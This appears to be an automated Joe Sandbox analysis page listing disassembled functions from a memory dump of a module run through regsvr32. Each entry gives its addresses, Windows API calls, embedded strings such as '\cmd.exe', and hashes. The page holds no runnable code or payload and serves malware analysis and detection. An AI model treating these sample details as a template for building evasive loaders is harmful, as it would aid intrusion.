Function 00007FF8A9367FE0 Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF8A9368046

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 252966722c9250e948d75cb97bb9ab9402504ab94b176e16b446967a805d112d
Instruction ID: 2e3978b8962600f3395580273d5f2bbecea1020f2dc767bb58c09d8fdf95f5f6
Opcode Fuzzy Hash: 252966722c9250e948d75cb97bb9ab9402504ab94b176e16b446967a805d112d
Instruction Fuzzy Hash: F821A271A1FF42A6EB644F24944437A76B0FB48798F14AA34CB1C8A3D4DFBD9884C740

Function 00007FF8A9346FA5 Relevance: 1.3, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A9347C00: GetCurrentProcessId.KERNEL32 ref: 00007FF8A9347C60
Part of subcall function 00007FF8A9347C00: ProcessPrng.BCRYPTPRIMITIVES ref: 00007FF8A9347C8C
Part of subcall function 00007FF8A9347C00: HeapFree.KERNEL32 ref: 00007FF8A9347D37

CloseHandle.KERNEL32 ref: 00007FF8A93470FF

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: Process$CloseCurrentFreeHandleHeapPrng
String ID:
API String ID: 4199747799-0
Opcode ID: da5180e4e16525f5817a010a155a59fe325eaa8d8fbff17c4dd8bd5caba1d194
Instruction ID: 361c48c386675e35a159f49665015c3fc53d6f0886b79b978c6cfec3367a9cf5
Opcode Fuzzy Hash: da5180e4e16525f5817a010a155a59fe325eaa8d8fbff17c4dd8bd5caba1d194
Instruction Fuzzy Hash: 65F0302360AAC595EA528F25E9003BD62A4DB80FE9F199531DE0E87BD5CE7CE4C2C300

Non-executed Functions

Function 00007FF8A932B670 Relevance: 46.2, APIs: 28, Strings: 2, Instructions: 1220COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF8A932B70A

Strings

assertion failed: end >= start && end <= len, xrefs: 00007FF8A932D5FF
@, xrefs: 00007FF8A932D0C4

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: memcpy
String ID: @$assertion failed: end >= start && end <= len
API String ID: 3510742995-884486453
Opcode ID: 6ef8c1403187c47bb75ff94922eaf2aa0e92dc46975cd686280e47bf2c492bb2
Instruction ID: 59df3f059bc3892ab47bf0808350042e71c48847af0697dbb94d8f2d6b8bba7f
Opcode Fuzzy Hash: 6ef8c1403187c47bb75ff94922eaf2aa0e92dc46975cd686280e47bf2c492bb2
Instruction Fuzzy Hash: 2FC27C32A0EFC195EB608F2198443F923B1FB697C8F54A136CA5D9BB95DF38A645C340

Function 00007FF8A9346EE9 Relevance: 33.6, APIs: 17, Strings: 2, Instructions: 353COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF8A9346F00
DuplicateHandle.KERNEL32 ref: 00007FF8A9346F29
GetCurrentProcess.KERNEL32 ref: 00007FF8A9347070
DuplicateHandle.KERNEL32 ref: 00007FF8A934709A
GetLastError.KERNEL32 ref: 00007FF8A93470A9
CloseHandle.KERNEL32 ref: 00007FF8A93470DF

Strings

RUST_MIN_STACKlibrary\std\src\thread\mod.rsfailed to spawn thread, xrefs: 00007FF8A9347141
cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs, xrefs: 00007FF8A93474BD, 00007FF8A93474E6

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: Handle$CurrentDuplicateProcess$CloseErrorLast
String ID: RUST_MIN_STACKlibrary\std\src\thread\mod.rsfailed to spawn thread$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs
API String ID: 120317985-1624771165
Opcode ID: d08382fc645e9cff5db03e3e516b963eb1214b79fbf75101fe87d5bfd5bde891
Instruction ID: b645b33d01fdf00a5db4ba1cc37baba1d3728d027c85110547a05af12214835a
Opcode Fuzzy Hash: d08382fc645e9cff5db03e3e516b963eb1214b79fbf75101fe87d5bfd5bde891
Instruction Fuzzy Hash: 3CF17B21A0FEC2A5FB21AF6198003B927B0EF84BC5F45A535EE4E87796DE3CE5458340

Function 00007FF8A93356A0 Relevance: 23.2, APIs: 17, Instructions: 1948memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9335F73
HeapFree.KERNEL32 ref: 00007FF8A93360BA
HeapFree.KERNEL32 ref: 00007FF8A9336528
HeapFree.KERNEL32 ref: 00007FF8A9336547
HeapFree.KERNEL32 ref: 00007FF8A9336566
HeapFree.KERNEL32 ref: 00007FF8A9336585

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e9d8596face4a468f787794731ac78344fb93b55d608c7fa3dcc526014f6c78c
Instruction ID: b5a8a78a5f7e294c0a29dba91296cd4e1975b18f6871f647fd8a117525547894
Opcode Fuzzy Hash: e9d8596face4a468f787794731ac78344fb93b55d608c7fa3dcc526014f6c78c
Instruction Fuzzy Hash: 6F238D62A4AFC199E7718F25D8453EE33A4FB0579CF045239DA9D8BB99DF389291C300

Function 00007FF8A933B270 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 395COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF8A933B435
GetFullPathNameW.KERNEL32 ref: 00007FF8A933B451
GetLastError.KERNEL32 ref: 00007FF8A933B45C
GetLastError.KERNEL32 ref: 00007FF8A933B475

Strings

\\?\\\?\UNC\, xrefs: 00007FF8A933B593

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: ErrorLast$FullNamePath
String ID: \\?\\\?\UNC\
API String ID: 2482867836-3975371117
Opcode ID: 9bfa2c458f774559e193a62b51d3fe014730c439c61672ac31edcb296a240af0
Instruction ID: 050ec9dc059c5a3dddaac20f6897552a5a52bb54ee301acb85b7db54fa794c56
Opcode Fuzzy Hash: 9bfa2c458f774559e193a62b51d3fe014730c439c61672ac31edcb296a240af0
Instruction Fuzzy Hash: 03027062E4EED6A5EB609F11D4443BA23B4FB04BD4F44A13ADA5D9B6C5DF3CE6818300

Function 00007FF8A9345A20 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 269memoryCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF8A9345B28
GetSystemDirectoryW.KERNEL32 ref: 00007FF8A9345B33
GetLastError.KERNEL32 ref: 00007FF8A9345B3E
GetLastError.KERNEL32 ref: 00007FF8A9345B52
GetLastError.KERNEL32 ref: 00007FF8A9345BB4
HeapFree.KERNEL32 ref: 00007FF8A9345BDD
memcpy.MSVCRT ref: 00007FF8A9345C0F
HeapFree.KERNEL32 ref: 00007FF8A9345C2E

Strings

\cmd.exemaximum number of ProcThreadAttributes exceeded, xrefs: 00007FF8A9345C56, 00007FF8A9345C9F

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: ErrorLast$FreeHeap$DirectorySystemmemcpy
String ID: \cmd.exemaximum number of ProcThreadAttributes exceeded
API String ID: 2652732990-1207947948
Opcode ID: b4dbf27519c57c1e72fabdcd2eb2ec9bec78cb3436c5dfe29bb09ff950f95ec2
Instruction ID: 62686a2b141cdffe96fa4c3ebff38bb471b78075799c64f691a34ae1243e35b2
Opcode Fuzzy Hash: b4dbf27519c57c1e72fabdcd2eb2ec9bec78cb3436c5dfe29bb09ff950f95ec2
Instruction Fuzzy Hash: 42B1D126E0FEC26AE7658F2498543FA22A4FB44BD8F412131DA1ECB7C5DE7C96418300

Function 00007FF8A931E050 Relevance: 17.1, APIs: 10, Strings: 1, Instructions: 584COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?), ref: 00007FF8A931E590
TlsSetValue.KERNEL32(?,?,?,?), ref: 00007FF8A931E5A3
TlsGetValue.KERNEL32(?,?,?,?), ref: 00007FF8A931E5F0
TlsSetValue.KERNEL32(?,?,?,?), ref: 00007FF8A931E603
TlsGetValue.KERNEL32(?,?,?,?), ref: 00007FF8A931E650
TlsSetValue.KERNEL32(?,?,?,?), ref: 00007FF8A931E663
TlsGetValue.KERNEL32(?,?,?,?), ref: 00007FF8A931E6A0
TlsSetValue.KERNEL32(?,?,?,?), ref: 00007FF8A931E6B3
TlsGetValue.KERNEL32(?,?,?,?), ref: 00007FF8A931E6FC
TlsSetValue.KERNEL32(?,?,?,?), ref: 00007FF8A931E70D

Strings

00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899library\core\src\fmt\mod.rs, xrefs: 00007FF8A931E0D4, 00007FF8A931E31F

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: Value
String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899library\core\src\fmt\mod.rs
API String ID: 3702945584-4235933832
Opcode ID: 5fe83526eb6cddf82d861b40bd821c798507da5aeaa14f9e4c49249df05c8b3b
Instruction ID: 8ac2dcb7de9bc37ea59509a44173c39a380cdebb6e4a34d1f86b9043c339d75b
Opcode Fuzzy Hash: 5fe83526eb6cddf82d861b40bd821c798507da5aeaa14f9e4c49249df05c8b3b
Instruction Fuzzy Hash: E1220222B0EAD1A6EB248F2595007B867B1EF44BE4F54A635DE1D877E4EF3D9941C300

Function 00007FF8A931FC70 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 269windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF8A931FCAA
FormatMessageW.KERNEL32(?,?,?,?,?,?,00007FF8A931F78D), ref: 00007FF8A931FD0A
GetLastError.KERNEL32(?,?,?,?,?,?,00007FF8A931F78D), ref: 00007FF8A931FE00

Strings

assertion failed: self.is_char_boundary(new_len)/rustc/051478957371ee0084a7c0913941d2a8c4757bb9\library\alloc\src\string.rs, xrefs: 00007FF8A9320097
NTDLL.DLL, xrefs: 00007FF8A931FCBC

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: ErrorFormatLastMessagememset
String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/051478957371ee0084a7c0913941d2a8c4757bb9\library\alloc\src\string.rs
API String ID: 3213201652-1160814674
Opcode ID: 3960721bc8a1e007fb2ddf49eec8f961cbc5ab57f16a9b78a2fde4689177bfff
Instruction ID: 231d7c2ecf89f7d03f806301bd123194048f1d41f86fa0e1a7a8ad0889ee484d
Opcode Fuzzy Hash: 3960721bc8a1e007fb2ddf49eec8f961cbc5ab57f16a9b78a2fde4689177bfff
Instruction Fuzzy Hash: CFC18E22A0EED2A4FB758F21D8007FC26B1EB457C4F54A135DA4D86BE9EF7CA6459300

Function 00007FF8A93476D0 Relevance: 12.2, APIs: 8, Instructions: 242memoryCOMMON

Download Yara Rule

APIs

HeapReAlloc.KERNEL32 ref: 00007FF8A9347793
HeapFree.KERNEL32 ref: 00007FF8A9347A72

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: Heap$AllocFree
String ID:
API String ID: 1379380650-0
Opcode ID: b5e8c2bd7d64487019ea57f0d6a4cbf120b4ff4e9bd64e8b98161bc81e34be2f
Instruction ID: 0a158de7802b3c96bb383675ff619ad81cdfd59da5cf805557c35a570d1cb3a0
Opcode Fuzzy Hash: b5e8c2bd7d64487019ea57f0d6a4cbf120b4ff4e9bd64e8b98161bc81e34be2f
Instruction Fuzzy Hash: 8E91E462E0EED2A0EE149F2694053B912B1FF89BE5F56A631DD2E873D1DE3CA441C300

Function 00007FF8A932BCAF Relevance: 11.4, APIs: 9, Instructions: 199memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A932C826
HeapFree.KERNEL32 ref: 00007FF8A932C83F
HeapFree.KERNEL32 ref: 00007FF8A932C858
HeapFree.KERNEL32 ref: 00007FF8A932C877
HeapFree.KERNEL32 ref: 00007FF8A932C896
HeapFree.KERNEL32 ref: 00007FF8A932C8DC
HeapFree.KERNEL32 ref: 00007FF8A932D27D
HeapFree.KERNEL32 ref: 00007FF8A932D7C3
HeapFree.KERNEL32(?,?,?,?,00007FF8A9322AE5,?,?,00007FF8A9334545,?,?,?,00007FF8A932790C,?,?,?,?), ref: 00007FF8A932D83C

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e482d034b548d87bad6a82a4cf6e0bbe39d7589f556d2251f85782997d42bc3f
Instruction ID: 5f5d05473a2798e84e2abb8f4e8b8308cacefa7028afec9db6c636e84444c3fb
Opcode Fuzzy Hash: e482d034b548d87bad6a82a4cf6e0bbe39d7589f556d2251f85782997d42bc3f
Instruction Fuzzy Hash: 15916D22E0EFC2A4F7648F2188543F927B1EB597C8F54A076DA5D87A89CF3DA944D340

Function 00007FF8A9317DB0 Relevance: 10.4, Strings: 7, Instructions: 1651COMMON

Download Yara Rule

Strings

SizeLimitExhausted, xrefs: 00007FF8A9319780
`fmt::Error`s should be impossible without a `fmt::Formatter`, xrefs: 00007FF8A9318902
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF8A93195B8
,(><&*@, xrefs: 00007FF8A9319128
__ZN, xrefs: 00007FF8A931809A
::_$, xrefs: 00007FF8A9318DE3, 00007FF8A9318E92
.llvm./rust/deps\rustc-demangle-0.1.24\src/lib.rs, xrefs: 00007FF8A9317DDE

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: memcmp
String ID: ,(><&*@$.llvm./rust/deps\rustc-demangle-0.1.24\src/lib.rs$::_$$SizeLimitExhausted$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`$called `Result::unwrap()` on an `Err` value
API String ID: 1475443563-3519419861
Opcode ID: a6de1efbbb16900b6ad75f113feea97af4d722feec8099256361e3ccac9fff69
Instruction ID: 5036660a61507501366503e8b1e6c5c5848be9d93cd78cfe9595e8fdff137009
Opcode Fuzzy Hash: a6de1efbbb16900b6ad75f113feea97af4d722feec8099256361e3ccac9fff69
Instruction Fuzzy Hash: CFE23222E1EEE261FF248E1594046BDAB72EB457C4F646131DA1E8B6E4EFBCD941C304

Function 00007FF8A932BE34 Relevance: 9.0, APIs: 7, Instructions: 279memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A932C826
HeapFree.KERNEL32 ref: 00007FF8A932C83F
HeapFree.KERNEL32 ref: 00007FF8A932C858
HeapFree.KERNEL32 ref: 00007FF8A932C877
HeapFree.KERNEL32 ref: 00007FF8A932C896
HeapFree.KERNEL32 ref: 00007FF8A932C8DC
HeapFree.KERNEL32 ref: 00007FF8A932D27D

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 39ea998cab3b8e9a6f1b09ffa4bcc5159b74de121971418e2a7a6988c1585840
Instruction ID: 507660ec576892ae36a2eac2ac09a2cf7198444ee234a92169afd44843cdfc40
Opcode Fuzzy Hash: 39ea998cab3b8e9a6f1b09ffa4bcc5159b74de121971418e2a7a6988c1585840
Instruction Fuzzy Hash: BBC1A022A0EFC295F7258F2198403FA36B1FB647D8F54A136CA1E9BAD4CF399645D340

Function 00007FF8A932B200 Relevance: 9.0, APIs: 7, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF8A932B2C5
memcpy.MSVCRT ref: 00007FF8A932B32B
memcpy.MSVCRT ref: 00007FF8A932B386
memcpy.MSVCRT ref: 00007FF8A932B3EA

Part of subcall function 00007FF8A934B740: GetProcessHeap.KERNEL32(?,?,?,00007FF8A9308D4D), ref: 00007FF8A934B781

HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000621,?,000000FF,?), ref: 00007FF8A932B61E
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000621,?,000000FF,?), ref: 00007FF8A932B63A
